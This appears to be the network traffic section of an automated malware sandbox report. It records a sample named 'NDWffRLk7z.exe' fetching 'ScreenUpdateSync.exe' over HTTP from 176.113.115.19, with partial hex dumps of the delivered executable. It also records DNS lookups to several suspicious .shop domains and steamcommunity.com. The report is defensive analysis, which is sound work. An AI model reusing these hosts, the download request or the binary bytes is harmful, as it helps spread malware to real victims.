Jan 12, 2025 17:47:06.450999022 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451034069 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451041937 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451041937 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451072931 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451080084 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451106071 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451138973 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451148033 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451148033 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451174021 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451193094 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451206923 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451241016 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451246023 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451246023 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451276064 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451292992 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451311111 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451320887 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451365948 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451399088 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451401949 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451401949 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451432943 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451457024 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451467037 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451513052 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451513052 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451756001 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451811075 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451817989 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451870918 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451905012 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451913118 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451913118 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451941013 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.451966047 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.451975107 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.452003956 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.452009916 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.452044010 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.452050924 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.452050924 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.452078104 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.452111006 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.452122927 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.452122927 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.452146053 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.452152967 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.452178955 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.452203989 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.452213049 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.452228069 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.452249050 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.452260017 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.452286005 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.452333927 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.452333927 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500003099 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500015974 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500029087 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500047922 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500055075 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500061035 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500071049 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500083923 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500096083 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500106096 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500113010 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500113010 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500123024 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500134945 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500144958 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500157118 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500168085 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500180006 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500183105 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500183105 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500204086 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500219107 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500330925 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500394106 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500405073 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500418901 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500430107 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.500432014 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500432014 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500457048 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.500540018 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.534667969 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534692049 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534703970 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534725904 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.534739971 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534753084 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534769058 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534791946 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534802914 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534805059 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.534805059 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.534823895 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.534853935 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.534888983 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534900904 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534914017 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534924030 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.534929991 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535041094 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535052061 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535053968 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535064936 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535074949 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535088062 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535104036 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535104036 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535136938 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535155058 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535166979 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535176992 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535176992 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535181046 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535206079 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535295963 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535322905 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535341978 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535341978 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535417080 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535429001 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535442114 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535454035 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535454035 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535454035 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535492897 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535492897 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535567045 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535578966 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535590887 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535602093 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535619974 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535623074 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535630941 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535650015 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535660982 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535661936 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535660982 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535702944 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535804987 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535877943 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535890102 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535902977 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535914898 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535917044 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535928965 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535940886 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535945892 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535945892 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.535952091 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:06.535979033 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:06.536048889 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:47:09.365408897 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:09.365444899 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:09.365551949 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:09.366753101 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:09.366765022 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.007133007 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.007203102 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.009031057 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.009037971 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.009308100 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.062469959 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.103332043 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.488655090 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.488678932 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.488687038 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.488709927 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.488722086 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.488729000 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.488753080 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.488820076 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.488820076 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.573198080 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.573237896 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.573295116 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.573319912 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.573353052 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.573398113 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.573398113 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.575865984 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.575865984 CET	49730	443	192.168.2.11	104.102.49.254
Jan 12, 2025 17:47:10.575900078 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:10.575905085 CET	443	49730	104.102.49.254	192.168.2.11
Jan 12, 2025 17:47:11.331036091 CET	80	49709	176.113.115.19	192.168.2.11
Jan 12, 2025 17:47:11.331337929 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:48:54.173309088 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:48:54.673259020 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:48:55.376244068 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:48:56.673235893 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:48:59.173115015 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:49:04.013488054 CET	49709	80	192.168.2.11	176.113.115.19
Jan 12, 2025 17:49:13.619329929 CET	49709	80	192.168.2.11	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 17:47:04.202394962 CET	64121	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:04.240746975 CET	53	64121	1.1.1.1	192.168.2.11
Jan 12, 2025 17:47:09.096843004 CET	53943	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:09.106204033 CET	53	53943	1.1.1.1	192.168.2.11
Jan 12, 2025 17:47:09.109909058 CET	55202	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:09.119154930 CET	53	55202	1.1.1.1	192.168.2.11
Jan 12, 2025 17:47:09.123270035 CET	56412	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:09.131956100 CET	53	56412	1.1.1.1	192.168.2.11
Jan 12, 2025 17:47:09.133793116 CET	57398	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:09.144172907 CET	53	57398	1.1.1.1	192.168.2.11
Jan 12, 2025 17:47:09.147874117 CET	62856	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:09.156399965 CET	53	62856	1.1.1.1	192.168.2.11
Jan 12, 2025 17:47:09.158119917 CET	53151	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:09.165563107 CET	53	53151	1.1.1.1	192.168.2.11
Jan 12, 2025 17:47:09.167608976 CET	50434	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:09.178004026 CET	53	50434	1.1.1.1	192.168.2.11
Jan 12, 2025 17:47:09.179426908 CET	61343	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:09.263638020 CET	53	61343	1.1.1.1	192.168.2.11
Jan 12, 2025 17:47:09.266467094 CET	56135	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:09.344438076 CET	53	56135	1.1.1.1	192.168.2.11
Jan 12, 2025 17:47:09.349148989 CET	51077	53	192.168.2.11	1.1.1.1
Jan 12, 2025 17:47:09.356425047 CET	53	51077	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 12, 2025 17:47:04.202394962 CET	192.168.2.11	1.1.1.1	0x8888	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.096843004 CET	192.168.2.11	1.1.1.1	0x64a2	Standard query (0)	skidjazzyric.click	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.109909058 CET	192.168.2.11	1.1.1.1	0x4db6	Standard query (0)	soundtappysk.shop	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.123270035 CET	192.168.2.11	1.1.1.1	0xa01e	Standard query (0)	femalsabler.shop	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.133793116 CET	192.168.2.11	1.1.1.1	0x5e6b	Standard query (0)	apporholis.shop	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.147874117 CET	192.168.2.11	1.1.1.1	0x21c4	Standard query (0)	crowdwarek.shop	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.158119917 CET	192.168.2.11	1.1.1.1	0xf1c4	Standard query (0)	versersleep.shop	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.167608976 CET	192.168.2.11	1.1.1.1	0x82b7	Standard query (0)	chipdonkeruz.shop	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.179426908 CET	192.168.2.11	1.1.1.1	0xad7d	Standard query (0)	handscreamny.shop	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.266467094 CET	192.168.2.11	1.1.1.1	0xeba	Standard query (0)	robinsharez.shop	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.349148989 CET	192.168.2.11	1.1.1.1	0x9b46	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 12, 2025 17:47:04.240746975 CET	1.1.1.1	192.168.2.11	0x8888	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:04.240746975 CET	1.1.1.1	192.168.2.11	0x8888	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.106204033 CET	1.1.1.1	192.168.2.11	0x64a2	Name error (3)	skidjazzyric.click	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.119154930 CET	1.1.1.1	192.168.2.11	0x4db6	Name error (3)	soundtappysk.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.131956100 CET	1.1.1.1	192.168.2.11	0xa01e	Name error (3)	femalsabler.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.144172907 CET	1.1.1.1	192.168.2.11	0x5e6b	Name error (3)	apporholis.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.156399965 CET	1.1.1.1	192.168.2.11	0x21c4	Name error (3)	crowdwarek.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.165563107 CET	1.1.1.1	192.168.2.11	0xf1c4	Name error (3)	versersleep.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.178004026 CET	1.1.1.1	192.168.2.11	0x82b7	Name error (3)	chipdonkeruz.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.263638020 CET	1.1.1.1	192.168.2.11	0xad7d	Name error (3)	handscreamny.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.344438076 CET	1.1.1.1	192.168.2.11	0xeba	Name error (3)	robinsharez.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 12, 2025 17:47:09.356425047 CET	1.1.1.1	192.168.2.11	0x9b46	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

steamcommunity.com

176.113.115.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49709	176.113.115.19	80	4468	C:\Users\user\Desktop\NDWffRLk7z.exe

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 17:47:05.275867939 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Jan 12, 2025 17:47:05.960719109 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:47:05 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sun, 12 Jan 2025 16:45:01 GMT ETag: "62a00-62b850c908464" Accept-Ranges: bytes Content-Length: 403968 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7 b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7 b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7 a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7 b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7 52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00 00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$RichPELf6pP@i(iP.text46 `.rdataV"P$:@@.data\|^@.nosuSHt@.muwavZ`@.roxahp@@.rsrcij@@
Jan 12, 2025 17:47:05.960758924 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 80 44 00 75 02 f3 c3 e9 b2 04 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 29 06 00 00 8b Data Ascii: ;DuUQeVEPuu)u9EttM^USVuF3u@t9FW>+~,WPVYP;uFyFN _Ff^[]
Jan 12, 2025 17:47:05.960814953 CET	1236	IN	Data Raw: ff 55 8b ec 56 8b 75 08 85 f6 75 09 56 e8 35 00 00 00 59 eb 2f 56 e8 7c ff ff ff 59 85 c0 74 05 83 c8 ff eb 1f f7 46 0c 00 40 00 00 74 14 56 e8 93 0e 00 00 50 e8 bf 0e 00 00 59 f7 d8 59 1b c0 eb 02 33 c0 5e 5d c3 6a 14 68 d0 65 44 00 e8 ed 12 00 Data Ascii: UVuuV5Y/V\|YtF@tVPYY3^]jheD3}}jY}3u;5JJ98t^@tVPVYY3BUJHt/9UuPJYtE9}utP/YuE}F3uJ4V
Jan 12, 2025 17:47:05.960850000 CET	1236	IN	Data Raw: 00 00 59 6a 00 ff 15 9c 50 44 00 68 c8 51 44 00 ff 15 98 50 44 00 83 3d e0 94 44 00 00 75 08 6a 01 e8 1f 36 00 00 59 68 09 04 00 c0 ff 15 94 50 44 00 50 ff 15 90 50 44 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 80 44 00 74 13 41 83 f9 2d Data Ascii: YjPDhQDPD=Duj6YhPDPPDUE3;DtA-rHwjX]D]DjY;#]1uxD1u\|DUVMQY0^]jh`fDM3;v.jX3;E@u
Jan 12, 2025 17:47:05.960886002 CET	448	IN	Data Raw: 33 c9 66 83 fe 0a 0f 94 c1 43 43 83 85 44 e5 ff ff 02 89 b5 40 e5 ff ff 89 8d 20 e5 ff ff 3c 01 74 04 3c 02 75 52 ff b5 40 e5 ff ff e8 bd 3c 00 00 59 66 3b 85 40 e5 ff ff 0f 85 68 03 00 00 83 85 38 e5 ff ff 02 83 bd 20 e5 ff ff 00 74 29 6a 0d 58 Data Ascii: 3fCCD@ <t<uR@<Yf;@h8 t)jXP@<Yf;@;80E9D'8T4D83@4@<9M (<D+4
Jan 12, 2025 17:47:05.960922003 CET	1236	IN	Data Raw: 2b 8d 34 e5 ff ff 8d 85 48 e5 ff ff 3b 4d 10 73 46 8b 95 44 e5 ff ff 83 85 44 e5 ff ff 02 0f b7 12 41 41 66 83 fa 0a 75 16 83 85 30 e5 ff ff 02 6a 0d 5b 66 89 18 40 40 83 85 3c e5 ff ff 02 83 85 3c e5 ff ff 02 66 89 10 40 40 81 bd 3c e5 ff ff fe Data Ascii: +4H;MsFDDAAfu0j[f@@<<f@@<rH+j,PSHP4PDb,8;ZD+4;E?@9M\|D<+4jH^;Ms<DDfu
Jan 12, 2025 17:47:05.960942984 CET	1236	IN	Data Raw: 7e 04 01 74 0d 57 ff d3 57 e8 fc 3c 00 00 83 26 00 59 83 c6 08 81 fe a0 82 44 00 7c dc be 80 81 44 00 5f 8b 06 85 c0 74 09 83 7e 04 01 75 03 50 ff d3 83 c6 08 81 fe a0 82 44 00 7c e6 5e 5b c3 8b ff 55 8b ec 8b 45 08 ff 34 c5 80 81 44 00 ff 15 c4 Data Ascii: ~tWW<&YD\|D_t~uPD\|^[UE4DPD]jhfD3G}39DujMhYYu4D9tnj<Y;ue3QjYY]9u,hW;YYuW*<Y/]>
